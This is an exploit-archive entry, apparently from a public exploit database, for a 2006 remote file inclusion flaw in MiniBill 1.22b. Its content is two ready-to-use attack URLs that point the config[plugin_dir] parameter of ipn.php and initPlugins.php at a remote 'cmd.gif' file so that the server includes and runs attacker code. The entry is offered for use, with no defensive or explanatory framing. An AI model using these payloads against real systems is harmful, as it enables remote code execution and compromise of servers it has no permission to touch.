MiniBill <= 1.22b config[plugin_dir] Remote File Inclusion Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MiniBill <= 1.22b config[plugin_dir] Remote File Inclusion Vulnerabilities
# Published : 2006-08-29
# Author : the master
# Previous Title : PortailPHP mod_phpalbum <= 2.1.5 (chemin) Remote Include Vuln
# Next Title : ExBB Italiano <= 0.2 exbb[home_path] Remote File Include Vulnerability

########################################################################
#  MiniBill v1.22 Beta  Remote File Inclusion Vulnerability
#
#  Download: http://www.ultrize.com/minibill/download/minibill-20060714.zip
#
#  Found By: the master
#
########################################################################
#  exploit:
#
#
http://[Target]/[Path]/actions/ipn.php?config[plugin_dir]=http://cmd.gif?
#
http://[Target]/[Path]/include/initPlugins.php?config[plugin_dir]=http://cmd.gif?
########################################################################

# www.Syue.com [2006-08-29]